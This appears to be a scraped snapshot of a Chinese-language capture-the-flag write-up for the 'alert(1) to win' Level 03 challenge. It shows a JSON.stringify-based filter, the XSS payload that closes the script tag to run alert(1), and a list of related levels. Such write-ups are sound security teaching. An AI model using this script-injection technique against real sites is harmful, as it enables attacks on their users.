【alert(1) to win】 Level 03 - JSON
source link: https://exp-blog.com/safe/ctf/alert/level-03-json/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
【alert(1) to win】 Level 03
function escape(s) {
s = JSON.stringify(s);
return '<script>console.log(' + s + ');</script>';
}从代码可知对输入做了 stringify 过滤,关于其功能详见 这里
简单来说就是把 " 和 \ 都转义了,导致无法直接闭合函数。
但是闭合 <script> 就可以了,构造 payload 如下 (此处没有闭合后半段的双引号,而是通过行注释 // 屏蔽掉):
</script><script>alert(1);//
- payload.js : 下载
Recommend
-
3
题目(隐藏关卡)javascriptfunction escape(input) { // WORLD -1 // strip off certain characters from breaking conditional statement input = input.replace(/[}<]/g, ''); return '...
-
3
【prompt(1) to win】 Level 6 javascriptfunction escape(input) { // let's do a post redirection try { // pass in formURL#formDataJSON...
-
5
【prompt(1) to win】 Level B javascriptfunction escape(input) { // name should not contain special characters var memberName = input.replace(/[[|\s+*...
-
5
【prompt(1) to win】 Level 0 javascriptfunction escape(input) { // warm up // script should be executed without user interaction return '<...
-
1
【alert(1) to win】 Level 09 javascriptfunction escape(s) { s = JSON.stringify(s).replace(/<\/script/gi, ''); return '<script>console.log(' + s...
-
5
【alert(1) to win】 Level 01 javascriptfunction escape(s) { return '<sc...
-
3
【prompt(1) to win】 Level 3 javascriptfunction escape(input) { // filter potential comment end delimiters input = input.replace(/->/g, '_');...
-
3
【prompt(1) to win】 Level D javascriptfunction escape(input) { // extend method from Underscore library // _.extend(destination, *sources) func...
-
2
【alert(1) to win】 Level 02 javascriptfunction escape(s) { s = s.replace(/"/g, '\\"'); return '<script>console.log("' + s + '");</script>';...
-
1
【alert(1) to win】 Level 07 javascriptfunction escape(s) { return '<script>console.log("' + s.toUpperCase() + '")</script>'; }
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK